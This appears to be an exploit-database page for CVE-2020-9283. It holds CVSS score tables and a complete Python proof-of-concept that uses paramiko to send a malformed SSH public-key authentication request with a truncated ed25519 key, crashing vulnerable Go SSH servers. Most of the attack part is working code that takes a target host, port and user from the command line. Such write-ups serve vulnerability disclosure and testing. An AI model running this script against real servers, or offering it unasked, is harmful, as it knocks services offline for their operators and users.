Lucene search

K
exploitpackMark AdamsEXPLOITPACK:BBAC75CC4F436EA7C87BF4A93573E140
HistoryFeb 24, 2020 - 12:00 a.m.

Go SSH servers 0.0.2 - Denial of Service (PoC)

2020-02-2400:00:00
Mark Adams
21

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

Go SSH servers 0.0.2 - Denial of Service (PoC)

# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC)
# Author: Mark Adams
# Date: 2020-02-21
# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py
# CVE: CVE-2020-9283
#
# Running this script may crash the remote SSH server if it is vulnerable.
# The GitHub repository contains a vulnerable and fixed SSH server for testing.
#
# $ python poc.py
# ./poc.py <host> <port> <user>
#
# $ python poc.py localhost 2022 root
# Malformed auth request sent. This should cause a panic on the remote server.
#

#!/usr/bin/env python

import socket
import sys

import paramiko
from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST

if len(sys.argv) != 4:
    print('./poc.py <host> <port> <user>')
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))

t = paramiko.Transport(sock)
t.start_client()

t.lock.acquire()
m = paramiko.Message()
m.add_byte(cMSG_SERVICE_REQUEST)
m.add_string("ssh-userauth")
t._send_message(m)

m = paramiko.Message()
m.add_byte(cMSG_USERAUTH_REQUEST)
m.add_string(user)
m.add_string("ssh-connection")
m.add_string('publickey')
m.add_boolean(True)
m.add_string('ssh-ed25519')

# Send an SSH key that is too short (ed25519 keys are 32 bytes)
m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short')

# Send an empty signature (the server won't get far enough to validate it)
m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00')

t._send_message(m)

print('Malformed auth request sent. This should cause a panic on the remote server.')

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:N/I:N/A:P

Related for EXPLOITPACK:BBAC75CC4F436EA7C87BF4A93573E140